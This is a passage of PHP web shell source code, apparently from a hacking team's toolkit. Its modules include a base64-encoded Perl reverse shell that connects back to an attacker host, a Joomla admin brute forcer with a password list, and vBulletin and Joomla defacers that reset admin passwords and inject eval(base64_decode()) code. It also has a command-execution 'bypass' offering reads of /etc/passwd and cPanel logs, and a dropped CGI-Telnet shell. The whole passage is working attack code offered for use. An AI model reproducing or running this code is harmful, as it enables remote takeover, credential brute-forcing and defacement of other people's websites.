\'IyEvdXNyL2Jpbi9wZXJsDQogICAgICB1c2UgU29ja2V0Ow0KICAgICAgcHJpbnQgIkRhdGEgQ2hh\r\nMHMgQ29ubmVjdCBCYWNrIEJhY2tkb29yXG5cbiI7DQogICAgICBpZiAoISRBUkdWWzBdKSB7DQog\r\nICAgICAgIHByaW50ZiAiVXNhZ2U6ICQwIFtIb3N0XSA8UG9ydD5cbiI7DQogICAgICAgIGV4aXQo\r\nMSk7DQogICAgICB9DQogICAgICBwcmludCAiWypdIER1bXBpbmcgQXJndW1lbnRzXG4iOw0KICAg\r\nICAgJGhvc3QgPSAkQVJHVlswXTsNCiAgICAgICRwb3J0ID0gODA7DQogICAgICBpZiAoJEFSR1Zb\r\nMV0pIHsNCiAgICAgICAgJHBvcnQgPSAkQVJHVlsxXTsNCiAgICAgIH0NCiAgICAgIHByaW50ICJb\r\nKl0gQ29ubmVjdGluZy4uLlxuIjsNCiAgICAgICRwcm90byA9IGdldHByb3RvYnluYW1lKCd0Y3An\r\nKSB8fCBkaWUoIlVua25vd24gUHJvdG9jb2xcbiIpOw0KICAgICAgc29ja2V0KFNFUlZFUiwgUEZf\r\nSU5FVCwgU09DS19TVFJFQU0sICRwcm90bykgfHwgZGllICgiU29ja2V0IEVycm9yXG4iKTsNCiAg\r\nICAgIG15ICR0YXJnZXQgPSBpbmV0X2F0b24oJGhvc3QpOw0KICAgICAgaWYgKCFjb25uZWN0KFNF\r\nUlZFUiwgcGFjayAiU25BNHg4IiwgMiwgJHBvcnQsICR0YXJnZXQpKSB7DQogICAgICAgIGRpZSgi\r\nVW5hYmxlIHRvIENvbm5lY3RcbiIpOw0KICAgICAgfQ0KICAgICAgcHJpbnQgIlsqXSBTcGF3bmlu\r\nZyBTaGVsbFxuIjsNCiAgICAgIGlmICghZm9yayggKSkgew0KICAgICAgICBvcGVuKFNURElOLCI+\r\nJlNFUlZFUiIpOw0KICAgICAgICBvcGVuKFNURE9VVCwiPiZTRVJWRVIiKTsNCiAgICAgICAgb3Bl\r\nbihTVERFUlIsIj4mU0VSVkVSIik7DQogICAgICAgIGV4ZWMgeycvYmluL3NoJ30gJy1iYXNoJyAu\r\nICJcMCIgeCA0Ow0KICAgICAgICBleGl0KDApOw0KICAgICAgfQ0KICAgICAgcHJpbnQgIlsqXSBE\r\nYXRhY2hlZFxuXG4iOw==\';\r\n\r\n$file = fopen("dc.pl" ,"w+");\r\n$write = fwrite ($file ,base64_decode($netcatshell));\r\nfclose($file);\r\n    chmod("dc.pl",0755);\r\n   echo "<iframe src=cgitelnet1/izo.cin width=96% height=90% frameborder=0></iframe> \r\n\r\n \r\n </div>"; }\r\n//////////////////////////////////////////////////////////////////////////////////////////////\r\n\r\n\r\nelseif(isset($_GET[\'x\']) && ($_GET[\'x\'] == \'jbrute\')) \r\n{ \r\n?>\r\n<form action="?y=<?php echo $pwd; ?>&amp;x=jbrute" method="post">\r\n\r\n\t<meta name="author" content="RetnOHacK" />\r\n    <meta name="keywords" content="Joomla, Bruter, JoomlaBruter, JoomlaBruterForce, JoomlaBruterForceOnline" />\r\n    <meta name="description" content="RetnOHacK #Procoder\'z Team Albanian" />\r\n<center>\r\n</br></br>\r\n<center><b><font color="lime">+--=[ Joomla Bruter Force ]=--+</font></b><br /><br />\r\n<form method="post" action="" enctype="multipart/form-data"> \r\n<table class="tabnet" width="38%" border="0"><center>\r\n<th colspan="2">Joomla Brute Force</th>\r\n<tr><td><p ><font  class="d1">User :</font></th>\r\n<input class="inputz" type=\'text\' name="usr" value="admin" size="15"> </font></center><br /><br /></p>\r\n</td></tr>\r\n<tr><td><font class="">Sites list :</font> \r\n</td><td><font class="" >Pass list :</font></td></tr>\r\n<tr>\r\n\t\t<td>\r\n<textarea name="sites" style="background:black;" cols="40" rows="13" ></textarea>\r\n</td><td>\r\n<textarea name="w0rds" style="background:black;" cols="40" rows="13" >\r\nadmin\r\n123456\r\npassword\r\n102030\r\n123123\r\n12345\r\n123456789\r\npass\r\ntest\r\nadmin123\r\ndemo\r\n!@#$%^\r\n</textarea>\r\n</td></tr><center><tr><td>\r\n<font > \r\n<input class="inputzbut" type="submit" name="x" value="start" id="d4"> \r\n</font></td></tr><br>\r\ntanks for procoder\'z team albanian<br></center></table>\r\n</form></center>\r\n<? \r\n@set_time_limit(0); \r\n\r\nif($_POST[\'x\']){ \r\n\r\necho "<hr>"; \r\n\r\n$sites = explode("\\n",$_POST["sites"]); // Get Sites \r\n$w0rds = explode("\\n",$_POST["w0rds"]); // Get w0rdLiSt \r\n\r\n$Attack = new Joomla_brute_Force(); // Active Class \r\n\r\n\r\nforeach($w0rds as $pwd){ \r\n\r\nforeach($sites as $site){ \r\n\r\n\r\n$Attack->check_it(txt_cln($site),$_POST[\'usr\'],txt_cln($pwd)); // Brute :D \r\nflush();flush(); \r\n\r\n} \r\n\r\n} \r\n\r\n} \r\n\r\n\r\n# Class & Function\'z \r\n\r\nfunction txt_cln($value){  return str_replace(array("\\n","\\r"),"",$value); } \r\n\r\nclass Joomla_brute_Force{ \r\n\r\npublic function check_it($site,$user,$pass){ // print result \r\n\r\nif(eregi(\'com_config\',$this->post($site,$user,$pass))){ \r\n\r\necho "<span class=\\"x2\\"><b># Success : $user:$pass -> <a href=\'$site/administrator/index.php\'>$site/administrator/index.php</a></b></span><BR>";\r\n$f = fopen("Result.txt","a+"); fwrite($f , "Success ~~ $user:$pass -> $site/administrator/index.php\\n"); fclose($f); \r\nflush(); \r\n}else{ echo "# Failed : $user:$pass -> $site<BR>"; flush();} \r\n\r\n} \r\n\r\npublic function post($site,$user,$pass){ // Post -> user & pass \r\n\r\n$token = $this->extract_token($site); \r\n\r\n$curl=curl_init(); \r\n\r\ncurl_setopt($curl,CURLOPT_RETURNTRANSFER,1); \r\ncurl_setopt($curl,CURLOPT_URL,$site."/administrator/index.php"); \r\n@curl_setopt($curl,CURLOPT_COOKIEFILE,\'cookie.txt\'); \r\n@curl_setopt($curl,CURLOPT_COOKIEJAR,\'cookie.txt\'); \r\ncurl_setopt($curl,CURLOPT_USERAGENT,\'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.15) Gecko/2008111317  Firefox/3.0.4\'); \r\n@curl_setopt($curl,CURLOPT_FOLLOWLOCATION,1); \r\ncurl_setopt($curl,CURLOPT_POST,1); \r\ncurl_setopt($curl,CURLOPT_POSTFIELDS,\'username=\'.$user.\'&passwd=\'.$pass.\'&lang=en-GB&option=com_login&task=login&\'.$token.\'=1\'); \r\ncurl_setopt($curl,CURLOPT_TIMEOUT,20); \r\n\r\n$exec=curl_exec($curl); \r\ncurl_close($curl); \r\nreturn $exec; \r\n\r\n} \r\n\r\npublic function extract_token($site){ // get token from source for -> function post \r\n\r\n$source = $this->get_source($site); \r\n\r\npreg_match_all("/type=\\"hidden\\" name=\\"([0-9a-f]{32})\\" value=\\"1\\"/si" ,$source,$token); \r\n\r\nreturn $token[1][0]; \r\n\r\n} \r\n\r\npublic function get_source($site){ // get source for -> function extract_token \r\n\r\n$curl=curl_init(); \r\ncurl_setopt($curl,CURLOPT_RETURNTRANSFER,1); \r\ncurl_setopt($curl,CURLOPT_URL,$site."/administrator/index.php"); \r\n@curl_setopt($curl,CURLOPT_COOKIEFILE,\'cookie.txt\'); \r\n@curl_setopt($curl,CURLOPT_COOKIEJAR,\'cookie.txt\'); \r\ncurl_setopt($curl,CURLOPT_USERAGENT,\'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.15) Gecko/2008111317  Firefox/3.0.4\'); \r\n@curl_setopt($curl,CURLOPT_FOLLOWLOCATION,1); \r\ncurl_setopt($curl,CURLOPT_TIMEOUT,20); \r\n\r\n$exec=curl_exec($curl); \r\ncurl_close($curl); \r\nreturn $exec; \r\n\r\n} \r\n\r\n} \r\n}\r\n/////////////////////////////////////////////////////////////////////////////////////////////\r\n\r\nelseif(isset($_GET[\'x\']) && ($_GET[\'x\'] == \'vb\'))\r\n   {\r\n   ?>\r\n   <form action="?y=<?php echo $pwd; ?>&x=vb" method="post">\r\n   <br><br><br><div align="center">\r\n   <H2><span style="font-weight: 400"><font face="Trebuchet MS" size="4">\r\n   <b><font color="#00FF00">+--=[ VB Index Changer ]=--+</font></b>\r\n   </div><br>\r\n   <?\r\n   if(empty($_POST[\'index\'])){\r\n   echo "<center><FORM method=\\"POST\\">";\r\n   echo "<table class=\\"tabnet\\">\r\n<th colspan=\\"2\\">Vb Index Changer</th>\r\n<tr><td>host </td><td><input class=\\"inputz\\" type=\\"text\\" size=\\"60\\" name=\\"localhost\\" value=\\"localhost\\"></td></tr>\r\n<tr><td>database </td><td><input class=\\"inputz\\" type=\\"text\\" size=\\"60\\" name=\\"database\\" value=\\"forum_vb\\"></td></tr>\r\n<tr><td>username </td><td><input class=\\"inputz\\" type=\\"text\\" size=\\"60\\" name=\\"username\\" value=\\"user_vb\\"></td></tr>\r\n<tr><td>password </td><td><input class=\\"inputz\\" type=\\"text\\" size=\\"60\\" name=\\"password\\" value=\\"vb\\"></td></tr>\r\n</tr>\r\n<th colspan=\\"2\\">Your Index Code</th></table><table class=\\"tabnet\\">\r\n<TEXTAREA name=\\"index\\" rows=\\"13\\" style=\\"background:black\\" border=\\"1\\" cols=\\"69\\" name=\\"code\\">your index code</TEXTAREA><br>\r\n<INPUT class=\\"inputzbut\\" type=\\"submit\\" value=\\"setting\\" name=\\"send\\">\r\n</FORM></table></center>";\r\n    }else{\r\n    $localhost = $_POST[\'localhost\'];\r\n    $database = $_POST[\'database\'];\r\n    $username = $_POST[\'username\'];\r\n    $password = $_POST[\'password\'];\r\n    $index = $_POST[\'index\'];\r\n    @mysql_connect($localhost,$username,$password) or die(mysql_error());\r\n    @mysql_select_db($database) or die(mysql_error());\r\n    $index=str_replace("\\\'","\'",$index);\r\n    $set_index = "{\\${eval(base64_decode(\\\'";\r\n    $set_index .= base64_encode("echo \\"$index\\";");\r\n    $set_index .= "\\\'))}}{\\${exit()}}</textarea>";\r\n    echo("UPDATE template SET template =\'".$set_index."\' ") ;\r\n    $ok=@mysql_query("UPDATE template SET template =\'".$set_index."\'") or die(mysql_error());\r\n    if($ok){\r\n    echo "!! update finish !!<br><br>";\r\n    } \r\n  }\r\n}\r\n\r\n//////////////////////////////////////////////////////////////////////////////////////////////\r\n\r\nelseif(isset($_GET[\'x\']) && ($_GET[\'x\'] == \'bypass\')) \r\n{ \r\n?>\r\n<form action="?y=<?php echo $pwd; ?>&amp;x=bypass" method="post">\r\n\r\n<?php\r\necho "<center/><br/><b><font color=#00ff00>-=[ Command  Bypass Exploit ]=-</font></b><br>\r\n";\r\nprint_r(\'\r\n<pre>\r\n<form method="POST" action="">\r\n<b><font color=#00ff00><b><font color="#00ff00">Command  :=) </font></font></b><input name="baba" type="text" class="inputz" size="34"><input type="submit" class="inputzbut" value="Go">\r\n</form>\r\n<form method="POST" action=""><strong><b><font color="#00ff00">Menu Bypass  :=)  </font></strong><select name="liz0" size="1" class="inputz">\r\n<option value="cat /etc/passwd">/etc/passwd</option>\r\n<option value="netstat -an | grep -i listen">netstat</option>\r\n<option value="cat /var/cpanel/accounting.log">/var/cpanel/accounting.log</option>\r\n<option value="cat /etc/syslog.conf">/etc/syslog.conf</option>\r\n<option value="cat /etc/hosts">/etc/hosts</option>\r\n<option value="cat /etc/named.conf">/etc/named.conf</option>\r\n<option value="cat /etc/httpd/conf/httpd.conf">/etc/httpd/conf/httpd.conf</option>\r\n</select> <input type="submit" class="inputzbut" value="G&ouml;">\r\n</form>\r\n</pre>\r\n\');\r\nini_restore("safe_mode");\r\nini_restore("open_basedir");\r\n$liz0=shell_exec($_POST[baba]); \r\n$liz0zim=shell_exec($_POST[liz0]); \r\n$uid=shell_exec(\'id\');\r\n$server=shell_exec(\'uname -a\');\r\necho "<pre><h4>";\r\n\r\necho $liz0;\r\necho $liz0zim;\r\necho "</h4></pre>";\r\n "</div>"; }\r\n\r\n ///////////////////////////////////////////////////////////////////////////\r\n \r\n elseif(isset($_GET[\'x\']) && ($_GET[\'x\'] == \'jodexer\'))\r\n{\t\r\n?>\r\n<form action="?y=<?php echo $pwd; ?>&amp;x=jodexer" method="post">\r\n\r\n<?php\r\n\r\nfunction randomt() {\r\n    \r\n        $chars = "abcdefghijkmnopqrstuvwxyz023456789";\r\n        srand((double)microtime()*1000000);\r\n        $i = 0;\r\n        $pass = \'\' ;\r\n    \r\n        while ($i <= 7) {\r\n            $num = rand() % 33;\r\n            $tmp = substr($chars, $num, 1);\r\n            $pass = $pass . $tmp;\r\n            $i++;\r\n        }\r\n    \r\n        return $pass;\r\n    \r\n    }\r\n    function entre2v2($text,$marqueurDebutLien,$marqueurFinLien,$i=1)\r\n    {\r\n    $ar0=explode($marqueurDebutLien, $text);\r\n    $ar1=explode($marqueurFinLien, $ar0[$i]);\r\n    $ar=trim($ar1[0]);\r\n    return $ar;\r\n    }\r\n    if ($_POST[\'form_action\'])\r\n    {\r\n    \r\n    $text=file_get_contents($_POST[\'file\']);\r\n    $username=entre2v2($text,"public $user = \'","\';");\r\n    $password=entre2v2($text,"public $password = \', \'","\';");\r\n    $dbname=entre2v2($text,"public $db = \', \'","\';");\r\n    $dbprefix=entre2v2($text,"public $dbprefix = \'","\';");\r\n    $site_url=($_POST[\'site_url\']);\r\n    \r\n    $h="<? echo(stripslashes(base64_decode(\'".urlencode(base64_encode(str_replace("\'","\'",($_POST[\'code\']))))."\'))); exit; ?>";\r\n    \r\n    $co=randomt();  \r\n      /*\r\n    echo($username);\r\n    echo("<br>");\r\n    echo($password);\r\n    echo("<br>");\r\n    echo($dbname);\r\n    echo("<br>");\r\n    echo($dbprefix);\r\n    echo("<br>");\r\n    */\r\n    $co=randomt();\r\n    \r\n    if ($_POST[\'form_action\'])\r\n    {\r\n    $h="<? echo(stripslashes(base64_decode(\'".urlencode(base64_encode(str_replace("\'","\'",($_POST[\'code\']))))."\'))); exit; ?>";\r\n    \r\n    \r\n    \r\n    \r\n    \r\n          $link=mysql_connect("dzoed.druknet.bt",$username,$password) ;\r\n    \r\n             mysql_select_db($dbname,$link) ;\r\n    \r\n    $tryChaningInfo = mysql_query("UPDATE ".$dbprefix."users SET username =\'admin\' , password = \'2a9336f7666f9f474b7a8f67b48de527:DiWqRBR1thTQa2SvBsDqsUENrKOmZtAX\'");\r\n    echo("<br>[+] Changing admin password to 123456789");  \r\n                    \r\n                     $req =mysql_query("SELECT * from  `".$dbprefix."extensions` ");\r\n                    \r\n    if ( $req )\r\n    {\r\n    #################################################################\r\n    ######################        V1.6         ######################\r\n    #################################################################\r\n    \r\n                  \r\n    $req =mysql_query("SELECT * from  `".$dbprefix."template_styles` WHERE client_id=\'0\' and home=\'1\'");\r\n             $data = mysql_fetch_array($req);\r\n    $template_name=$data["template"];\r\n    \r\n    $req =mysql_query("SELECT * from  `".$dbprefix."extensions` WHERE name=\'".$template_name."\'");\r\n             $data = mysql_fetch_array($req);\r\n    $template_id=$data["extension_id"];\r\n    \r\n    $url2=$site_url."/index.php";\r\n    \r\n    $ch = curl_init();\r\n    curl_setopt($ch, CURLOPT_URL, $url2);\r\n    curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);\r\n    curl_setopt($ch,CURLOPT_RETURNTRANSFER,1);\r\n    curl_setopt($ch, CURLOPT_HEADER, 1);\r\n    curl_setopt($ch, CURLOPT_USERAGENT, $useragent);\r\n        curl_setopt($ch, CURLOPT_COOKIEJAR, $co);\r\n        curl_setopt($ch, CURLOPT_COOKIEFILE, $co);\r\n    \r\n    \r\n    $buffer = curl_exec($ch);\r\n    \r\n    $return=entre2v2($buffer ,\'<input type="hidden" name="return" value="\',\'"\');\r\n    $hidden=entre2v2($buffer ,\'<input type="hidden" name="\',\'" value="1"\',4);\r\n    \r\n    ///////////////////////////\r\n    $url2=$site_url."/index.php";\r\n    $ch = curl_init();\r\n    curl_setopt($ch, CURLOPT_URL, $url2);\r\n    curl_setopt($ch, CURLOPT_POST, 1);\r\n    curl_setopt($ch, CURLOPT_POSTFIELDS,"username=admin&passwd=123456789&option=com_login&task=login&return=".$return."&".$hidden."=1");\r\n    curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);\r\n    curl_setopt($ch,CURLOPT_RETURNTRANSFER,1);\r\n    curl_setopt($ch, CURLOPT_HEADER, 0);\r\n    curl_setopt($ch, CURLOPT_USERAGENT, $useragent);\r\n    curl_setopt($ch, CURLOPT_COOKIEJAR, $co);\r\n    curl_setopt($ch, CURLOPT_COOKIEFILE, $co);\r\n    $buffer = curl_exec($ch);\r\n    \r\n    $pos = strpos($buffer,"com_config");\r\n    if($pos === false) {\r\n    echo("<br>[-] Login Error");\r\n    exit;\r\n    }\r\n    else {\r\n    echo("<br>[~] Login Successful");\r\n    }\r\n    ///////////////////////////\r\n    $url2=$site_url."/index.php?option=com_templates&task=source.edit&id=".base64_encode($template_id.":index.php");\r\n    $ch = curl_init();\r\n    curl_setopt($ch, CURLOPT_URL, $url2);\r\n    curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);\r\n    curl_setopt($ch,CURLOPT_RETURNTRANSFER,1);\r\n    curl_setopt($ch, CURLOPT_HEADER, 0);\r\n    curl_setopt($ch, CURLOPT_USERAGENT, $useragent);\r\n    curl_setopt($ch, CURLOPT_COOKIEJAR, $co);\r\n    curl_setopt($ch, CURLOPT_COOKIEFILE, $co);\r\n    $buffer = curl_exec($ch);\r\n    \r\n    $hidden2=entre2v2($buffer ,\'<input type="hidden" name="\',\'" value="1"\',2);\r\n    if($hidden2) {\r\n    echo("<br>[+] index.php file founded in Theme Editor");\r\n    }\r\n    else {\r\n    echo("<br>[-] index.php Not found in Theme Editor");\r\n    exit;\r\n    }\r\n    echo("<br>[*] Updating Index.php .....");\r\n    $url2=$site_url."/index.php?option=com_templates&layout=edit";\r\n    \r\n    $ch = curl_init();\r\n    curl_setopt($ch, CURLOPT_URL, $url2);\r\n    curl_setopt($ch, CURLOPT_POST, 1);\r\n    curl_setopt($ch, CURLOPT_POSTFIELDS,"jform[source]=".$h."&jform[filename]=index.php&jform[extension_id]=".$template_id."&".$hidden2."=1&task=source.save");\r\n    \r\n    curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);\r\n    curl_setopt($ch,CURLOPT_RETURNTRANSFER,1);\r\n    curl_setopt($ch, CURLOPT_HEADER, 0);\r\n    curl_setopt($ch, CURLOPT_USERAGENT, $useragent);\r\n    curl_setopt($ch, CURLOPT_COOKIEJAR, $co);\r\n    curl_setopt($ch, CURLOPT_COOKIEFILE, $co);\r\n    $buffer = curl_exec($ch);\r\n    \r\n    $pos = strpos($buffer,\'<dd class="message message">\');\r\n    if($pos === false) {\r\n    echo("<br>[-] Updating Index.php Error");\r\n    exit;\r\n    }\r\n    else {\r\n    echo("<br>[~] index.php successfully saved");\r\n    }\r\n    #################################################################\r\n    ######################      V1.6  END      ######################\r\n    #################################################################\r\n    \r\n    \r\n    }\r\n    else\r\n    {\r\n    \r\n    #################################################################\r\n    ######################      V1.5           ######################\r\n    #################################################################\r\n                    \r\n    $req =mysql_query("SELECT * from  `".$dbprefix."templates_menu` WHERE client_id=\'0\'");\r\n             $data = mysql_fetch_array($req);\r\n    $template_name=$data["template"];\r\n    \r\n    $url2=$site_url."/index.php";\r\n    $ch = curl_init();\r\n    curl_setopt($ch, CURLOPT_URL, $url2);\r\n    curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);\r\n    curl_setopt($ch,CURLOPT_RETURNTRANSFER,1);\r\n    curl_setopt($ch, CURLOPT_HEADER, 1);\r\n    curl_setopt($ch, CURLOPT_USERAGENT, $useragent);\r\n        curl_setopt($ch, CURLOPT_COOKIEJAR, $co);\r\n        curl_setopt($ch, CURLOPT_COOKIEFILE, $co);\r\n    $buffer = curl_exec($ch);\r\n    \r\n    $hidden=entre2v2($buffer ,\'<input type="hidden" name="\',\'" value="1"\',3);\r\n    \r\n    $url2=$site_url."/index.php";\r\n    $ch = curl_init();\r\n    curl_setopt($ch, CURLOPT_URL, $url2);\r\n    curl_setopt($ch, CURLOPT_POST, 1);\r\n    curl_setopt($ch, CURLOPT_POSTFIELDS,"username=admin&passwd=123456789&option=com_login&task=login&".$hidden."=1");\r\n    curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);\r\n    curl_setopt($ch,CURLOPT_RETURNTRANSFER,1);\r\n    curl_setopt($ch, CURLOPT_HEADER, 0);\r\n    curl_setopt($ch, CURLOPT_USERAGENT, $useragent);\r\n    curl_setopt($ch, CURLOPT_COOKIEJAR, $co);\r\n    curl_setopt($ch, CURLOPT_COOKIEFILE, $co);\r\n    $buffer = curl_exec($ch);\r\n    \r\n    $pos = strpos($buffer,"com_config");\r\n    \r\n    if($pos === false) {\r\n    echo("<br>[-] Login Error");\r\n    exit;\r\n    }\r\n    else {\r\n    echo("<br>[+] Login Successful");\r\n    }\r\n    ///////////////////////////\r\n    $url2=$site_url."/index.php?option=com_templates&task=edit_source&client=0&id=".$template_name;\r\n    $ch = curl_init();\r\n    curl_setopt($ch, CURLOPT_URL, $url2);\r\n    curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);\r\n    curl_setopt($ch,CURLOPT_RETURNTRANSFER,1);\r\n    curl_setopt($ch, CURLOPT_HEADER, 0);\r\n    curl_setopt($ch, CURLOPT_USERAGENT, $useragent);\r\n        curl_setopt($ch, CURLOPT_COOKIEJAR, $co);\r\n        curl_setopt($ch, CURLOPT_COOKIEFILE, $co);\r\n    $buffer = curl_exec($ch);\r\n    \r\n    $hidden2=entre2v2($buffer ,\'<input type="hidden" name="\',\'" value="1"\',6);\r\n    \r\n    if($hidden2) {\r\n    echo("<br>[~] index.php file founded in Theme Editor");\r\n    }\r\n    else {\r\n    echo("<br>[-] index.php Not found in Theme Editor");\r\n    }\r\n    \r\n    echo("<br>[*] Updating Index.php .....");\r\n    $url2=$site_url."/index.php?option=com_templates&layout=edit";\r\n    $ch = curl_init();\r\n    curl_setopt($ch, CURLOPT_URL, $url2);\r\n    curl_setopt($ch, CURLOPT_POST, 1);\r\n    curl_setopt($ch, CURLOPT_POSTFIELDS,"filecontent=".$h."&id=".$template_name."&cid[]=".$template_name."&".$hidden2."=1&task=save_source&client=0");\r\n    curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);\r\n    curl_setopt($ch,CURLOPT_RETURNTRANSFER,1);\r\n    curl_setopt($ch, CURLOPT_HEADER, 0);\r\n    curl_setopt($ch, CURLOPT_USERAGENT, $useragent);\r\n        curl_setopt($ch, CURLOPT_COOKIEJAR, $co);\r\n        curl_setopt($ch, CURLOPT_COOKIEFILE, $co);\r\n    $buffer = curl_exec($ch);\r\n    \r\n    $pos = strpos($buffer,\'<dd class="message message fade">\');\r\n    if($pos === false) {\r\n    echo("<br>[-] Updating Index.php Error");\r\n    exit;\r\n    }\r\n    else {\r\n    echo("<br>[~] index.php successfully saved");\r\n    }\r\n    #################################################################\r\n    ######################      V1.5  END      ######################\r\n    #################################################################\r\n    \r\n    }\r\n    \r\n    }\r\n    \r\n    \r\n    function randomt() {\r\n    \r\n        $chars = "abcdefghijkmnopqrstuvwxyz023456789";\r\n        srand((double)microtime()*1000000);\r\n        $i = 0;\r\n        $pass = \'\' ;\r\n    \r\n        while ($i <= 7) {\r\n            $num = rand() % 33;\r\n            $tmp = substr($chars, $num, 1);\r\n            $pass = $pass . $tmp;\r\n            $i++;\r\n        }\r\n    \r\n        return $pass;\r\n    \r\n    }\r\n    \r\n    function entre2v2($text,$marqueurDebutLien,$marqueurFinLien,$i=1)\r\n    \r\n    {\r\n    \r\n    $ar0=explode($marqueurDebutLien, $text);\r\n    $ar1=explode($marqueurFinLien, $ar0[$i]);\r\n    $ar=trim($ar1[0]);\r\n    return $ar;\r\n    }\r\n    \r\n    }?>\r\n    <center><br><br>\r\n    <font color="#00ff00" size=\'+3\'><b>+--=[ Automatic Joomla Index Changer ]=--+</b></font><br><br>\r\n    </center>\r\n    <center><b>\r\n    Link of symlink configuration.php of Joomla<br></b>\r\n    <FORM action=""  method="post">\r\n    <input type="hidden" name="form_action" value="1">\r\n     <input type="text" class="inputz" size="60" name="file" value="http://site.com/sym/home/user/public_html/configuration.php">\r\n    <br>\r\n    <br><b>\r\n    Admin Control panel url</b><br>\r\n    <input type="text" class="inputz" size="40" name="site_url" value="http://site/administrator"><br>\r\n    <br><b>\r\n    Your Index Code</b>\r\n    <br>\r\n    <TEXTAREA rows="20" align="center" style="background:black" cols="120" name="code"> your index code\r\n            </TEXTAREA>\r\n            <br>\r\n    <INPUT  class="inputzbut" type="submit" value="Lets Go Deface !!!" name="Submit">\r\n    </FORM>\r\n     </center>\r\n    <script language=JavaScript>m=\'%09%09%09%09%09%09%09%3C/td%3E%0A%09%09%09%09%09%09%3C/tr%3E%0A%09%09%09%09%09%3C/table%3E%0A%09%09%09%09%3C/td%3E%0A%3C/html%3E\';d=unescape(m);document.write(d);</script>\r\n\t<?php\r\n}\r\n ///////////////////////////////////////////////////////////////////////////\r\n \r\n elseif(isset($_GET[\'x\']) && ($_GET[\'x\'] == \'cgi2012\')) { \r\n echo "<center/><br/><b>\r\n +--==[ CGI-Telnet Version 1.3 ]==--+ \r\n </b><br><br>";\r\n \r\n \r\n    mkdir(\'cgi2012\', 0755);\r\n    chdir(\'cgi2012\');\r\n        $kokdosya = ".htaccess";\r\n        $dosya_adi = "$kokdosya";\r\n        $dosya = fopen ($dosya_adi , \'w\') or die ("Dosya a&#231;&#305;lamad&#305;!");\r\n        $metin = "AddHandler cgi-script .izo";    \r\n        fwrite ( $dosya , $metin ) ;\r\n        fclose ($dosya);\r\n$cgi2012 = \'IyEvdXNyL2Jpbi9wZXJsIC1JL3Vzci9sb2NhbC9iYW5kbWluCnVzZSBNSU1FOjpCYXNlNjQ7CiRWZXJzaW9uPSAiQ0dJLVRlbG5ldCBWZXJzaW9uIDEuMyI7CiRFZGl0UGVyc2lvbj0iPGZvbnQgc3R5bGU9J3RleHQtc2hhZG93OiAwcHggMHB4IDZweCByZ2IoMjU1LCAwLCAwKSwgMHB4IDBweCA1cHggcmdiKDMwMCwgMCwgMCksIDBweCAwcHggNXB4IHJnYigzMDAsIDAsIDApOyBjb2xvcjojZmZmZmZmOyBmb250LXdlaWdodDpib2xkOyc+YjM3NGsgLSBDR0ktVGVsbmV0PC9mb250PiI7CgokUGFzc3dvcmQgPSAiYmFuZHVuZ2tvdGFzYW1wYWgiOwkJCSMgQ2hhbmdlIHRoaXMuIFlvdSB3aWxsIG5lZWQgdG8gZW50ZXIgdGhpcwoJCQkJIyB0byBsb2dpbi4Kc3ViIElzX1dpbigpewoJJG9zID0gJnRyaW0oJEVOVnsiU0VSVkVSX1NPRlRXQVJFIn0pOwoJaWYoJG9zID1+IG0vd2luL2kpewoJCXJldHVybiAxOwoJfQoJZWxzZXsKCQlyZXR1cm4gMDsKCX0KfQokV2luTlQgPSAmSXNfV2luKCk7CQkJCSMgWW91IG5lZWQgdG8gY2hhbmdlIHRoZSB2YWx1ZSBvZiB0aGlzIHRvIDEgaWYKCQkJCQkJCQkjIHlvdSdyZSBydW5uaW5nIHRoaXMgc2NyaXB0IG9uIGEgV2luZG93cyBOVAoJCQkJCQkJCSMgbWFjaGluZS4gSWYgeW91J3JlIHJ1bm5pbmcgaXQgb24gVW5peCwgeW91CgkJCQkJCQkJIyBjYW4gbGVhdmUgdGhlIHZhbHVlIGFzIGl0IGlzLgoKJE5UQ21kU2VwID0gIiYiOwkJCQkjIFRoaXMgY2hhcmFjdGVyIGlzIHVzZWQgdG8gc2VwZXJhdGUgMiBjb21tYW5kcwoJCQkJCQkJCSMgaW4gYSBjb21tYW5kIGxpbmUgb24gV2luZG93cyBOVC4KCiRVbml4Q21kU2VwID0gIjsiOwkJCQkjIFRoaXMgY2hhcmFjdGVyIGlzIHVzZWQgdG8gc2VwZXJhdGUgMiBjb21tYW5kcwoJCQkJCQkJCSMgaW4gYSBjb21tYW5kIGxpbmUgb24gVW5peC4KCiRDb21tYW5kVGltZW91dER1cmF0aW9uID0gMTAwMDA7CSMgVGltZSBpbiBzZWNvbmRzIGFmdGVyIGNvbW1hbmRzIHdpbGwgYmUga2lsbGVkCgkJCQkJCQkJIyBEb24ndCBzZXQgdGhpcyB0byBhIHZlcnkgbGFyZ2UgdmFsdWUuIFRoaXMgaXMKCQkJCQkJCQkjIHVzZWZ1bCBmb3IgY29tbWFuZHMgdGhhdCBtYXkgaGFuZyBvciB0aGF0CgkJCQkJCQkJIyB0YWtlIHZlcnkgbG9uZyB0byBleGVjdXRlLCBsaWtlICJmaW5kIC8iLgoJCQkJCQkJCSMgVGhpcyBpcyB2YWxpZCBvbmx5IG9uIFVuaXggc2VydmVycy4gSXQgaXMKCQkJCQkJCQkjIGlnbm9yZWQgb24gTlQgU2VydmVycy4KCiRTaG93RHluYW1pY091dHB1dCA9IDE7CQkJIyBJZiB0aGlzIGlzIDEsIHRoZW4gZGF0YSBpcyBzZW50IHRvIHRoZQoJCQkJCQkJCSMgYnJvd3NlciBhcyBzb29uIGFzIGl0IGlzIG91dHB1dCwgb3RoZXJ3aXNlCgkJCQkJCQkJIyBpdCBpcyBidWZmZXJlZCBhbmQgc2VuZCB3aGVuIHRoZSBjb21tYW5kCgkJCQkJCQkJIyBjb21wbGV0ZXMuIFRoaXMgaXMgdXNlZnVsIGZvciBjb21tYW5kcyBsaWtlCgkJCQkJCQkJIyBwaW5nLCBzbyB0aGF0IHlvdSBjYW4gc2VlIHRoZSBvdXRwdXQgYXMgaXQKCQkJCQkJCQkjIGlzIGJlaW5nIGdlbmVyYXRlZC4KCiMgRE9OJ1QgQ0hBTkdFIEFOWVRISU5H